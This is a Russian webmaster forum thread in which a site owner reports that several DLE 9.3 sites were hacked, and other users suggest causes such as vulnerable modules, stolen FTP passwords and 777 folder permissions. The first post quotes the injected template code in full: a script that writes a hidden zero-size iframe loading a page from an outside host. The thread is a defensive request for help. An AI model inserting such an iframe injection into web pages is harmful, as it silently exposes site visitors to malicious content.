X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Взломали несколько сайтов на ДЛЕ
bmp104
bmp104
Topic Starter сообщение 28.12.2011, 17:45; Ответить: bmp104
Сообщение #1


Взломали несколько сайтов на ДЛЕ 9.3, в шаблоне main появился код:

<script type="text/javascript">
function writeHTMLasJS(){
document.write("<iframe src=\"http:\/\/75.zapto.org\/bleedeng\/index.php\" width=\"0\" height=\"0\" frameborder=\"0\"> <\/iframe>");
}
</script>

<!--
now place this function call at whatever point
it needs to write the markup on to the page: -->

<script type="text/javascript">
writeHTMLasJS();
</script>


Может кто уже сталкивался с таким же, подскажите как могли ломануть.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
un1name1d
un1name1d
сообщение 28.12.2011, 17:47; Ответить: un1name1d
Сообщение #2


http://www.maultalk.com/topic101650s0.html (хотя там WP, а здесь - ДЛЕ, ну да ладно, методы профилактики подходят).

Сообщение отредактировал un1name1d - 28.12.2011, 17:48
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nick777
nick777
сообщение 29.12.2011, 0:20; Ответить: nick777
Сообщение #3


un1ymous, +1.

Еще хочу добавить, что на DLE часто модули разные уязвимы - погуглите: "название модуля +уязвимость" - так с каждым модулем. Еще не помешает: "версия dle +уязвимость".


--------------------
На мобильной рекламе можно зарабатывать по-белому здесь!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
referer
referer
сообщение 29.12.2011, 0:25; Ответить: referer
Сообщение #4


дле не ломали у меня хоть и версии древние 8-е на двух сайтах, но за джумлу знаю что постоянно домают)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
xadminx
xadminx
сообщение 29.12.2011, 0:38; Ответить: xadminx
Сообщение #5


могли у вас увести пароли от фтп


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
hostingbloger
hostingbloger
сообщение 29.12.2011, 1:09; Ответить: hostingbloger
Сообщение #6


Какие права стоят на /uploads и на /templates ? 777?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ZorG
ZorG
сообщение 29.12.2011, 2:12; Ответить: ZorG
Сообщение #7


Что в логах?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Exebit
Exebit
сообщение 30.12.2011, 10:30; Ответить: Exebit
Сообщение #8


Попробуйте запустить антивирус встроенный в DLE 9.3 он покажет все левые файлы, а там уже можно прикинуть как сломали и еще какая версия движка, официальная или зануленная?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bmp104
bmp104
Topic Starter сообщение 6.2.2012, 13:37; Ответить: bmp104
Сообщение #9


Какие права стоят на /uploads и на /templates ? 777?


Да, при установке сказано их ставить.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) [Продам] базы сайтов на CMS Wordpress/Joomla/Drupal/Magento/...
8 phosphoruss 5251 Вчера, 20:47
автор: phosphoruss
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыКомплексный прогон сайтов
все под ключ - траст+блоги+форумы+каталоги+доски+закладки
186 fichik 287404 Вчера, 20:39
автор: fichik
Открытая тема (нет новых ответов) Может кто подкинуть бесплатных больших баз сайтов?
23 Himena 9762 Вчера, 14:44
автор: Trustobmen
Горячая тема (нет новых ответов) Оптимизация сайтов, продвижение, наращивание ссылок
Большой опыт работы, отзывы
275 tario777 159313 Вчера, 14:25
автор: tario777
Открытая тема (нет новых ответов) Трафик для ваших сайтов
Средняя цена 90р. за 1000 посетителей
28 Fine 16868 Вчера, 8:41
автор: nikalex


 



RSS Текстовая версия Сейчас: 2.12.2021, 7:25
Дизайн